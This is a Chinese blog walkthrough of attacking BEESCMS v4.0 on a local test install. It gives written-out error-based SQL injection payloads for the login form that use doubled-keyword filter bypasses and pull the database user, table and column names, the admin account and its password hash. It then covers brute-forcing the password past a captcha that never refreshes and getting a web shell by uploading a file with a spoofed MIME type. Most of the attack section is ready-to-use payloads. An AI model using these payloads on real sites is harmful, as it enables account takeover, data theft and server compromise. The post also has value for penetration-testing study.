beescms注入

明弟有理想2024-10-29 21:22

前期准备

靶机名称or源码名称:BEES_V4.0_R_20160525.rar
官方下载地址:http://beescms.com/cxxz.html
(一) 环境搭建:

#解压源码文件到网站根目录

#访问源码文件install完成按照提示完成安装

#修改mysql.ini 文件,在mysqld 下添加条目: secure_file_priv =,保存然后重启phpstudy,不然用mysql写入文件会报错。

一、预备知识:

枚举法(俗称暴力破解):

在 进行归纳推理时,如果逐个考察了某类事件的所有可能情况,因而得出一般结论,那么这结论是可靠的,这种归纳方法叫做枚举法。枚举法是利用计算机运算速度 快、精确度高的特点,对要解决问题的所有可能情况,一个不漏地进行检验,从中找出符合要求的答案,因此枚举法是通过牺牲时间来换取答案的全面性。

在数学和计算机科学理论中,一个集的枚举是列出某些有穷序列集的所有成员的程序,或者是一种特定类型对象的计数。这两种类型经常(但不总是)重叠。

SQL注入:

SQL 注入即是指Web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在Web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句, 在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。

二、实验步骤

扫描发现登录地址

(一) SQL注入

登录页面SQL注入漏洞,我们就不用sqlmap了手注

经过测试发现一些常用的sql注入危险函数被过滤使用复写绕过

|---|--------|--------------|
| 常用的一些函数双写绕过写法 |||
| 1 | and | an and d |
| 2 | select | seleselectct |
| 3 | from | fro from m |
| 4 | where | wh where ere |
| 5 | = | like |

因为注入点在登录界面看不到回显,所以使用报错注入

复制代码 
admin' a and nd updatexml(1,concat(0x7e,user(),0x7e),1)--+

查询到当前用户为root

查询表明发现字符应该是被限制了,使用substr截取

查询表名

复制代码 
user=admin' a and nd updatexml(1,concat(0x7e,(selselectect group_concat(table_name) fr from om information_schema.tables wh where ere table_schema like database()),0x7e),1)--+

查询后32个字符

复制代码 
user=admin' a and nd updatexml(1,concat(0x7e,(substr((selselectect group_concat(table_name) fr from om information_schema.tables wh where ere table_schema like database()),32,64)),0x7e),1)--+

查询bees_admin里的字段

复制代码 
user=admin'a and nd updatexml(1,concat(0x7e,substr((selselectect group_concat(column_name) fr from om information_schema.columns whe where re table_schema like database()),1,32),0x7e),1)--+&password=123456&code=a9c5&submit=true&submit.x=57&submit.y=23

查询到admin_name字段里的内容用户为admin

复制代码 
user=admin'a and nd updatexml(1,concat(0x7e,(selselectect group_concat(admin_name) fr from om beescms.bees_admin),0x7e),1)--+

查询密码

复制代码 
user=admin'a and nd updatexml(1,concat(0x7e,substr((selselectect group_concat(admin_password) fr from om beescms.bees_admin),7,32),0x7e),1)--+

拼接后密码MD5值为

21232f297a57a5a743894a0e4a801fc3

解密的结果为

(二) 弱口令爆破

这里的验证码在不刷新页面的情况下,是可以无限尝试登录的,所以我们可以对密码进行爆破

添加payload

admin length不同很有可能是密码

(三) 文件上传

网站有文件上传点

修改mime类型即可绕过

成功getshel

相关推荐
白山云北诗1 天前
深度解读云防火墙(WAF):守护网络安全的智能卫士
安全·web安全·防火墙·waf·云防火墙·web应用防火墙
douluo9981 天前
老飞飞bug及原理修复方法
安全·web安全
忘川w1 天前
《网络安全与防护》知识点复习
笔记·安全·web安全·网络安全
Bruce_Liuxiaowei2 天前
使用Nmap探测VNC服务信息—某单位KVM设备
网络·安全·web安全
安全系统学习2 天前
网络安全之内核初级对抗技术分析
开发语言·python·算法·安全·web安全
qq_243050792 天前
aflplusplus:开源的模糊测试工具!全参数详细教程!Kali Linux教程!(一)
linux·web安全·网络安全·黑客·渗透测试·模糊测试·kali linux
WHOAMI_老猫2 天前
xss注入遇到转义,html编码绕过了解一哈
javascript·web安全·渗透测试·xss·漏洞原理
上海云盾-高防顾问2 天前
云安全与网络安全:核心区别与协同作用解析
安全·web安全
枷锁—sha2 天前
【DVWA系列】——xss(DOM)——High详细教程
前端·web安全·网络安全·xss
gaog2zh3 天前
010502管道符_防火墙出入站_不回显带外-渗透命令-基础入门-网络安全
web安全·不回显带外·管道符·防火墙出入站
热门推荐
01Coze扣子平台完整体验和实践(附国内和国际版对比)02DeepSeek各版本说明与优缺点分析03KGG转MP3工具|非KGM文件|解密音频04扣子(coze)实战|我用扣子搭建了一个自动分析小红薯笔记内容的AI应用|详细步骤拆解05零代码入门 | Coze——让大模型接入自己的数据库06从零安装 LLaMA-Factory 微调 Qwen 大模型成功及所有的坑07AI Agent | Coze 插件使用指南:从功能解析到实操步骤08YOLOv8入门 | 重要性能衡量指标、训练结果评价及分析及影响mAP的因素【发论文关注的指标】09【SpeedAI科研小助手】2分钟极速解决知网维普重复率、AIGC率过高,一键全文降!文件格式不变,公式都保留的!10电工电子课程设计---四路病房呼叫系统